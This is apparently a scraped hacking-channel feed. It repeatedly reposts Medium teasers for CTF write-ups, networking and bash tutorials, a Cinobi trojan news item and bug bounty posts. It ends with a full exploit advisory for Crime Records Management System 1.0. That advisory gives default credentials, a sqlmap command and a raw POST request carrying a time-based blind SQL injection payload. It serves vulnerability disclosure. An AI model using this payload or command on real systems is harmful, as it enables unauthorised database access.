Hacking Articles Tips Tricks Videos Tutorials
Photo
Hacking on Medium
Call & Response -RACTF
https://cdn-images-1.medium.com/max/1500/0*lgd_Rgy69aX4bgd1
Call & Response immitates a red team like attack on a co-operate wifi network in which the users have been disconnected remotely in the…
Continue reading on Medium »
___________________________
@hacking_Attack
@Hacking_Video
Call & Response -RACTF
https://cdn-images-1.medium.com/max/1500/0*lgd_Rgy69aX4bgd1
Call & Response immitates a red team like attack on a co-operate wifi network in which the users have been disconnected remotely in the…
Continue reading on Medium »
___________________________
@hacking_Attack
@Hacking_Video
Medium
Call & Response -RACTF
Call & Response immitates a red team like attack on a co-operate wifi network in which the users have been disconnected remotely in the…
Hacking Articles Tips Tricks Videos Tutorials
Photo
Hacking on Medium
Monitoring Dashboard — RACTF
https://cdn-images-1.medium.com/max/1806/1*xqsVd4q0A4x8amavDTkYMQ.png
Here we are dealing with an exposed grafana Dashboard that presents some fake statistics about the ctf. Lets take a closer look at it.
Continue reading on Medium »
___________________________
@hacking_Attack
@Hacking_Video
Monitoring Dashboard — RACTF
https://cdn-images-1.medium.com/max/1806/1*xqsVd4q0A4x8amavDTkYMQ.png
Here we are dealing with an exposed grafana Dashboard that presents some fake statistics about the ctf. Lets take a closer look at it.
Continue reading on Medium »
___________________________
@hacking_Attack
@Hacking_Video
Medium
Monitoring Dashboard — RACTF
Here we are dealing with an exposed grafana Dashboard that presents some fake statistics about the ctf. Lets take a closer look at it.
Hacking Articles Tips Tricks Videos Tutorials
Photo
Hacking on Medium
PROTOSTAR WALKTHROUGH-Stack-1
https://cdn-images-1.medium.com/max/679/1*xc9U1hVSHty4sAqPVYqdOg.png
Hello hackers! hope you are all doing well today. Now that we have done stack-0 and have a basic idea of how a stack frame is built, we…
Continue reading on Medium »
___________________________
@hacking_Attack
@Hacking_Video
PROTOSTAR WALKTHROUGH-Stack-1
https://cdn-images-1.medium.com/max/679/1*xc9U1hVSHty4sAqPVYqdOg.png
Hello hackers! hope you are all doing well today. Now that we have done stack-0 and have a basic idea of how a stack frame is built, we…
Continue reading on Medium »
___________________________
@hacking_Attack
@Hacking_Video
Medium
PROTOSTAR WALKTHROUGH-Stack-1
Hello hackers! hope you are all doing well today. Now that we have done stack-0 and have a basic idea of how a stack frame is built, we can…
Hacking Articles Tips Tricks Videos Tutorials
Photo
Hacking on Medium
THM Bash Scripting (A Walkthrough room to teach you the basics of bash scripting) by Razrexe
https://cdn-images-1.medium.com/max/600/0*QdRWqp6MpwvrU9gt.jpeg
A Walk-through room to teach you the basics of bash scripting
Continue reading on Medium »
___________________________
@hacking_Attack
@Hacking_Video
THM Bash Scripting (A Walkthrough room to teach you the basics of bash scripting) by Razrexe
https://cdn-images-1.medium.com/max/600/0*QdRWqp6MpwvrU9gt.jpeg
A Walk-through room to teach you the basics of bash scripting
Continue reading on Medium »
___________________________
@hacking_Attack
@Hacking_Video
Medium
THM Bash Scripting (A Walkthrough room to teach you the basics of bash scripting) by Razrexe
A Walk-through room to teach you the basics of bash scripting
Hacking Articles Tips Tricks Videos Tutorials
Photo
Hacking on Medium
Understanding Networking
https://cdn-images-1.medium.com/max/1000/0*YXzoxlSFOHTRShkw
Let me explain networking in simple words first then we will look at the concepts behind it.
Continue reading on Medium »
___________________________
@hacking_Attack
@Hacking_Video
Understanding Networking
https://cdn-images-1.medium.com/max/1000/0*YXzoxlSFOHTRShkw
Let me explain networking in simple words first then we will look at the concepts behind it.
Continue reading on Medium »
___________________________
@hacking_Attack
@Hacking_Video
Medium
Understanding Networking
Let me explain networking in simple words first then we will look at the concepts behind it.
Hacking Articles Tips Tricks Videos Tutorials
Photo
Hacking on Medium
Los anuncios maliciosos se dirigen a los usuarios de criptomonedas con el troyano bancario Cinobi
https://cdn-images-1.medium.com/max/1200/0*YLtHAz_oerNhwvHn
POR EHACKING
Continue reading on Medium »
___________________________
@hacking_Attack
@Hacking_Video
Los anuncios maliciosos se dirigen a los usuarios de criptomonedas con el troyano bancario Cinobi
https://cdn-images-1.medium.com/max/1200/0*YLtHAz_oerNhwvHn
POR EHACKING
Continue reading on Medium »
___________________________
@hacking_Attack
@Hacking_Video
Medium
Los anuncios maliciosos se dirigen a los usuarios de criptomonedas con el troyano bancario Cinobi
POR EHACKING
Bug Bounty Website For Beginners
https://medium.com/@adarshx23/bug-bounty-website-for-beginners-a1557488fe6?source=rss------bug_bounty-5
What is Bug Bounty?Continue reading on Medium » (https://medium.com/@adarshx23/bug-bounty-website-for-beginners-a1557488fe6?source=rss------bug_bounty-5)
___________________________
@hacking_Attack
@Hacking_Video
https://medium.com/@adarshx23/bug-bounty-website-for-beginners-a1557488fe6?source=rss------bug_bounty-5
What is Bug Bounty?Continue reading on Medium » (https://medium.com/@adarshx23/bug-bounty-website-for-beginners-a1557488fe6?source=rss------bug_bounty-5)
___________________________
@hacking_Attack
@Hacking_Video
Medium
Bug Bounty Website For Beginners
What is Bug Bounty?
How I Found a Credential Exposure Bug on BBC.
https://medium.com/@anirudhsrinivas533/how-i-found-a-credential-exposure-bug-on-bbc-513368c28cc8?source=rss------bug_bounty-5
___________________________
@hacking_Attack
@Hacking_Video
https://medium.com/@anirudhsrinivas533/how-i-found-a-credential-exposure-bug-on-bbc-513368c28cc8?source=rss------bug_bounty-5
___________________________
@hacking_Attack
@Hacking_Video
Medium
How I Found a Credential Exposure Bug on BBC.
Hey all,
Hey all,Continue reading on Medium » (https://medium.com/@anirudhsrinivas533/how-i-found-a-credential-exposure-bug-on-bbc-513368c28cc8?source=rss------bug_bounty-5)
___________________________
@hacking_Attack
@Hacking_Video
___________________________
@hacking_Attack
@Hacking_Video
Medium
How I Found a Credential Exposure Bug on BBC.
Hey all,
Hacking Articles Tips Tricks Videos Tutorials
Photo
Exploit Collector
Crime Records Management System 1.0 SQL Injection
https://2.bp.blogspot.com/-ZkI_NEmJcds/WWlvjl_lr_I/AAAAAAAAIQo/28S1w7dyZRc0PebCQs4RPEz7Silw5ZbpgCLcBGAs/s1600/h95.png
Crime Records Management System version 1.0 suffers from a remote SQL injection vulnerability.
MD5 |
Download
Source:packetstormsecurity.com
___________________________
@hacking_Attack
@Hacking_Video
Crime Records Management System 1.0 SQL Injection
https://2.bp.blogspot.com/-ZkI_NEmJcds/WWlvjl_lr_I/AAAAAAAAIQo/28S1w7dyZRc0PebCQs4RPEz7Silw5ZbpgCLcBGAs/s1600/h95.png
Crime Records Management System version 1.0 suffers from a remote SQL injection vulnerability.
MD5 |
abc63d0985d59978216c036361a04b2cDownload
# Exploit Title: Crime records Management System 1.0 - 'Multiple' SQL Injection (Authenticated)
# Date: 17/08/2021
# Exploit Author: Davide 't0rt3ll1n0' Taraschi
# Vendor Homepage: https://www.sourcecodester.com/users/osman-yahaya
# Software Link: https://www.sourcecodester.com/php/14894/police-crime-record-management-system.html
# Version: 1.0
# Testeted on: Linux (Ubuntu 20.04) using LAMPP
## Impact:
An authenticated user may be able to read data for which is not authorized, tamper with or destroy data, or possibly even read/write files or execute code on the database server.
## Description:
All four parameters passed via POST are vulnerable:
`fname` is vulnerable both to boolean-based blind and time-based blind SQLi
`oname` is vulnerable both to boolean-based blind and time-based blind SQLi
`username` is only vulnerable to time-based blind SQLi
`status` is vulnerable both to boolean-based blind and time-based blind SQLi
## Remediation:
Here is the vulnerable code:
if($status==''){
mysqli_query($dbcon,"update userlogin set surname='$fname', othernames='$oname' where staffid='$staffid'")or die(mysqli_error());
}
if(!empty($status)){
mysqli_query($dbcon,"update userlogin set surname='$fname',status='$status', othernames='$oname' where staffid='$staffid'")or die(mysqli_error());
}
As you can see the parameters described above are passed to the code without being checked, this lead to the SQLi.
To patch this vulnerability, i suggest to sanitize those variables via `mysql_real_escape_string()` before being passed to the prepared statement.
## Exploitation through sqlmap
1) Log into the application (you can try the default creds 1111:admin123)
2) Copy your PHPSESSID cookie
3) Launch the following command:
sqlmap --method POST -u http://$target/ghpolice/admin/savestaffedit.php --data="fname=&oname=&username=&status=" --batch --dbs --cookie="PHPSESSID=$phpsessid"
replacing $target with your actual target and $phpsessid with the cookie that you had copied before
## PoC:
Request:
POST /ghpolice/admin/savestaffedit.php HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:91.0) Gecko/20100101 Firefox/91.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: it-IT,it;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 77
Origin: http://localhost
DNT: 1
Connection: close
Referer: http://localhost/ghpolice/admin/user.php
Cookie: PHPSESSID=f7123ac759cd97868df0f363434c423f
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
fname=' AND (SELECT * FROM (SELECT(SLEEP(5)))foo)-- &oname=&username=&status=
And after 5 seconds we got:
HTTP/1.1 200 OK
Date: Tue, 17 Aug 2021 14:28:59 GMT
Server: Apache/2.4.48 (Unix) OpenSSL/1.1.1k PHP/7.4.22 mod_perl/2.0.11 Perl/v5.32.1
X-Powered-By: PHP/7.4.22
Content-Length: 1074
Connection: close
Content-Type: text/html; charset=UTF-8
etc...
Source:packetstormsecurity.com
___________________________
@hacking_Attack
@Hacking_Video
Kitploit
Crime Records Management System 1.0 SQL Injection
Exploit Collector is the ultimate collection of public exploits and exploitable vulnerabilities. Remote/Local Exploits, Shellcode and 0days.